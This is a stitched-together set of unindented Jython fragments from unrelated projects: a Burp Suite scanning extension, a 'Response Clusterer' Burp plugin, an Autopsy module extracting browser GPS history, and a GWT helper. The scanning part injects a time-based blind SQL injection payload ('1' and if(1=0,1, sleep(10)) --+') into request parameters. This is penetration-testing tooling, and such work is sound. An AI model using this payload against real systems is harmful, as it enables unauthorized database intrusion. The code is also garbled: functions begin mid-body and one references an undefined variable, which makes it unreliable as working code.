baseExpression = 'User-Agent: ' + baseUserAgent
for value in self._simpleList:
oldExpression = 'User-Agent: ' + self._userAgent
newExpression = 'User-Agent: ' + value
# Update the values accordingly
requestBodyString = self._helpers.bytesToString(
self._requestBody)
self._requestBody = requestBodyString.replace(
oldExpression, newExpression)
self._userAgent = value
self.updateRequestViewer()
self.receiveResponse()
# Reset the value back to original after each loop
requestBodyString = self._helpers.bytesToString(self._requestBody)
self._requestBody = requestBodyString.replace(
newExpression, baseExpression)
self._savedUserAgent = baseUserAgent
self.updateRequestViewer()
# Perform level 1 scan also
self.autoScan1()
'''
Level 3 auto: Alpha: use the timer to perform blind insertion
'''
# TODO: 目前只支持GET/urlencoded,后续添加更多支持
def autoScan3(self):
self._timeReach = False
timer = Timer(5, self.timeReach)
# Modify the first element to perform blind injection
title = self._dataTable.getValueAt(i, 0)
oldExpression = title + '=' + self._dataDict[title]
newExpression = title + '=' + '1\' and if(1=0,1, sleep(10)) --+'
if self._postGet == 'GET':
# Update the values accordingly
requestBodyString = self._helpers.bytesToString(self._requestBody)
self._requestBody = requestBodyString.replace(
oldExpression, newExpression)
self._requestDataGet = self._requestDataGet.replace(
oldExpression, newExpression)
self._requestUrl = self._requestUrl.replace(
oldExpression, newExpression)
self._dataDict[title] = '1\' and if(1=0,1, sleep(10)) --+'
self._requestModel.setValueAt('1\' and if(1=0,1, sleep(10)) --+',
0, 1)
elif self._postGet == 'POST':
if self._dataType == 'urlencoded':
# Update the values accordingly
requestBodyString = self._helpers.bytesToString(
self._requestBody)
self._requestBody = requestBodyString.replace(
oldExpression, newExpression)
self._requestData = self._requestData.replace(
oldExpression, newExpression)
self._dataDict[title] = '1\' and if(1=0,1, sleep(10)) --+'
self._requestModel.setValueAt(
'1\' and if(1=0,1, sleep(10)) --+', 0, 1)
else:
print('autoScan3: _dataType not supported')
else:
print('autoScan3: _postGet not defined')
timer.start()
self.updateRequestViewer()
self.receiveResponse()
# Print the result
if self._timeReach:
print('Delay scan succeed')
else:
print('Delay scan failed')
# Cancel the timer
timer.cancel()
def timeReach(self):
self._timeReach = True
'''
Fetch the 'abnormal' payloads that shows very different response length from the normal ones
'''
def getAbnormal(self, basis, coefficient):
# If the basis is not set, do nothing
abnormList = ArrayList()
if basis == 0:
return None
# Fetch the abnormals from the log list
for log in self._log:
if float(log._responseLen) / float(basis) < coefficient or float(
basis) / float(log._responseLen) < coefficient:
abnormList.append(log._payload)
return abnormList
'''
Turn a simple dict of key/value pairs into XML
'''
def dictToXml(self, tag, d):
elem = Element(tag)
for key, val in d.items():
child = Element(key)
child.text = str(val)
# Add element in reverse order so that the result is correct
elem.insert(0, child)
return elem
'''
initRequestInfo
'''
def initRequestInfo(self):
self._postGet = ''
self._userAgent = ''
self._requestUrl = ''
self._requestBody = ''
self._requestData = ''
self._requestDataGet = ''
self._httpService = None
self._dataDict = {}
self._dataType = ''
self._dataLen = 0
self._attr = ''
self._contentLength = 0
self._currentlyDisplayedItem = None
'''
initResponseInfo
'''
def initResponseInfo(self):
self._responseBody = None
self._responseMessage = None
self._responseLength = ''
'''
printRequest
'''
def printRequest(self):
print('----------------')
print(self._postGet)
print('----------------')
print(self._userAgent)
print('----------------')
print(self._requestUrl)
print('----------------')
print(self._requestBody)
print('----------------')
print(self._requestData)
print('----------------')
print(self._requestDataGet)
print('----------------')
print(self._httpService)
print('----------------')
print(self._dataDict)
print('----------------')
print(self._dataLen)
print('----------------')
print(self._attr)
print('----------------')
'''
printResponse
'''
def printResponse(self):
print('----------------')
print(self._responseBody)
print('----------------')
print(self._responseMessage)
print('----------------')
print(self._responseLength)
print('----------------')
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("Response Clusterer")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
# main split pane
self._main_jtabedpane = JTabbedPane()
# The split pane with the log and request/respponse details
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
# table of log entries
logTable = Table(self)
scrollPane = JScrollPane(logTable)
self._splitpane.setLeftComponent(scrollPane)
# List of log entries
self._log_entries = []
# tabs with request/response viewers
tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
tabs.addTab("Request", self._requestViewer.getComponent())
tabs.addTab("Response", self._responseViewer.getComponent())
self._splitpane.setRightComponent(tabs)
#Setup the options
self._optionsJPanel = JPanel()
gridBagLayout = GridBagLayout()
gbc = GridBagConstraints()
self._optionsJPanel.setLayout(gridBagLayout)
self.max_clusters = 500
self.JLabel_max_clusters = JLabel("Maximum amount of clusters: ")
gbc.gridy = 0
gbc.gridx = 0
self._optionsJPanel.add(self.JLabel_max_clusters, gbc)
self.JTextField_max_clusters = JTextField(str(self.max_clusters), 5)
self.JTextField_max_clusters.getDocument().addDocumentListener(self)
gbc.gridx = 1
self._optionsJPanel.add(self.JTextField_max_clusters, gbc)
callbacks.customizeUiComponent(self.JLabel_max_clusters)
callbacks.customizeUiComponent(self.JTextField_max_clusters)
self.similarity = 0.95
self.JLabel_similarity = JLabel("Similarity (between 0 and 1)")
gbc.gridy = 1
gbc.gridx = 0
self._optionsJPanel.add(self.JLabel_similarity, gbc)
self.JTextField_similarity = JTextField(str(self.similarity), 5)
self.JTextField_similarity.getDocument().addDocumentListener(self)
gbc.gridx = 1
self._optionsJPanel.add(self.JTextField_similarity, gbc)
callbacks.customizeUiComponent(self.JLabel_similarity)
callbacks.customizeUiComponent(self.JTextField_similarity)
self.use_quick_similar = False
self.JLabel_use_quick_similar = JLabel(
"Use set intersection of space splitted tokens for similarity (default: optimized difflib.SequenceMatcher.quick_ratio)"
)
gbc.gridy = 2
gbc.gridx = 0
self._optionsJPanel.add(self.JLabel_use_quick_similar, gbc)
self.JCheckBox_use_quick_similar = JCheckBox("")
self.JCheckBox_use_quick_similar.addActionListener(self)
gbc.gridx = 1
self._optionsJPanel.add(self.JCheckBox_use_quick_similar, gbc)
callbacks.customizeUiComponent(self.JCheckBox_use_quick_similar)
self.response_max_size = 10 * 1024 #10kb
self.JLabel_response_max_size = JLabel("Response max size (bytes)")
gbc.gridy = 3
gbc.gridx = 0
self._optionsJPanel.add(self.JLabel_response_max_size, gbc)
self.JTextField_response_max_size = JTextField(
str(self.response_max_size), 5)
self.JTextField_response_max_size.getDocument().addDocumentListener(
self)
gbc.gridx = 1
self._optionsJPanel.add(self.JTextField_response_max_size, gbc)
callbacks.customizeUiComponent(self.JLabel_response_max_size)
callbacks.customizeUiComponent(self.JTextField_response_max_size)
self.uninteresting_mime_types = ('JPEG', 'CSS', 'GIF', 'script', 'GIF',
'PNG', 'image')
self.uninteresting_status_codes = ()
self.uninteresting_url_file_extensions = ('js', 'css', 'zip', 'war',
'jar', 'doc', 'docx', 'xls',
'xlsx', 'pdf', 'exe', 'dll',
'png', 'jpeg', 'jpg', 'bmp',
'tif', 'tiff', 'gif', 'webp',
'm3u', 'mp4', 'm4a', 'ogg',
'aac', 'flac', 'mp3', 'wav',
'avi', 'mov', 'mpeg', 'wmv',
'swf', 'woff', 'woff2')
about = "<html>"
about += "Author: floyd, @floyd_ch, http://www.floyd.ch<br>"
about += "modzero AG, http://www.modzero.ch<br>"
about += "<br>"
about += "<h3>Getting an overview of the tested website</h3>"
about += "<p style=\"width:500px\">"
about += "This plugin clusters all response bodies by similarity and shows a summary, one request/response per cluster. "
about += 'Adjust similarity in the options if you get too few or too many entries in the "One member of each cluster" '
about += "tab. The plugin will allow a tester to get an overview of the tested website's responses from all tools (scanner, proxy, etc.). "
about += "As similarity comparison "
about += "can use a lot of ressources, only small, in-scope responses that have interesting response codes, "
about += "file extensions and mime types are processed. "
about += "</p>"
about += "</html>"
self.JLabel_about = JLabel(about)
self.JLabel_about.setLayout(GridBagLayout())
self._aboutJPanel = JScrollPane(self.JLabel_about)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(tabs)
# add the splitpane and options to the main jtabedpane
self._main_jtabedpane.addTab("One member of each cluster", None,
self._splitpane, None)
self._main_jtabedpane.addTab("Options", None, self._optionsJPanel,
None)
self._main_jtabedpane.addTab("About & README", None, self._aboutJPanel,
None)
# clusters will grow up to self.max_clusters response bodies...
self._clusters = set()
self.Similarity = Similarity()
# Now load the already stored
with self._lock:
log_entries_from_storage = self.load_project_setting("log_entries")
if log_entries_from_storage:
for toolFlag, req, resp, url in log_entries_from_storage:
try:
self.add_new_log_entry(toolFlag, req, resp, url)
except Exception as e:
print "Exception when deserializing a stored log entry", toolFlag, url
print e
# Important: Do this at the very end (otherwise we could run into troubles locking up entire threads)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
def __findGeoLocationsInDB(self, databasePath, abstractFile):
if not databasePath:
return
try:
Class.forName("org.sqlite.JDBC") #load JDBC driver
connection = DriverManager.getConnection("jdbc:sqlite:" +
databasePath)
statement = connection.createStatement()
except (ClassNotFoundException) as ex:
self._logger.log(Level.SEVERE, "Error loading JDBC driver", ex)
self._logger.log(Level.SEVERE, traceback.format_exc())
return
except (SQLException) as ex:
# Error connecting to SQL databse.
return
resultSet = None
try:
resultSet = statement.executeQuery(
"SELECT timestamp, latitude, longitude, accuracy FROM CachedPosition;"
)
while resultSet.next():
timestamp = Long.valueOf(
resultSet.getString("timestamp")) / 1000
latitude = Double.valueOf(resultSet.getString("latitude"))
longitude = Double.valueOf(resultSet.getString("longitude"))
attributes = ArrayList()
artifact = abstractFile.newArtifact(
BlackboardArtifact.ARTIFACT_TYPE.TSK_GPS_TRACKPOINT)
attributes.add(
BlackboardAttribute(
BlackboardAttribute.ATTRIBUTE_TYPE.TSK_GEO_LATITUDE,
general.MODULE_NAME, latitude))
attributes.add(
BlackboardAttribute(
BlackboardAttribute.ATTRIBUTE_TYPE.TSK_GEO_LONGITUDE,
general.MODULE_NAME, longitude))
attributes.add(
BlackboardAttribute(
BlackboardAttribute.ATTRIBUTE_TYPE.TSK_DATETIME,
general.MODULE_NAME, timestamp))
attributes.add(
BlackboardAttribute(
BlackboardAttribute.ATTRIBUTE_TYPE.TSK_PROG_NAME,
general.MODULE_NAME, "Browser Location History"))
# artifact.addAttribute(BlackboardAttribute(BlackboardAttribute.ATTRIBUTE_TYPE.TSK_VALUE.getTypeID(),moduleName, accuracy))
# NOTE: originally commented out
artifact.addAttributes(attributes)
try:
# index the artifact for keyword search
blackboard = Case.getCurrentCase().getServices(
).getBlackboard()
blackboard.indexArtifact(artifact)
except Blackboard.BlackboardException as ex:
self._logger.log(
Level.SEVERE, "Unable to index blackboard artifact " +
str(artifact.getArtifactTypeName()), ex)
self._logger.log(Level.SEVERE, traceback.format_exc())
MessageNotifyUtil.Notify.error(
"Failed to index GPS trackpoint artifact for keyword search.",
artifact.getDisplayName())
except SQLException as ex:
# Unable to execute browser location SQL query against database.
pass
except Exception as ex:
self._logger.log(Level.SEVERE,
"Error putting artifacts to blackboard", ex)
self._logger.log(Level.SEVERE, traceback.format_exc())
finally:
try:
if resultSet is not None:
resultSet.close()
statement.close()
connection.close()
except Exception as ex:
# Error closing database.
pass
def convertStringArray(self, jsArray):
result = ArrayList((Long),)
try:
for i in range(0,jsArray.__len__()):
result.add(Long(jsArray.get(i)))
except Exception,e:
GWT.log(u"Failed to convert String array ", e)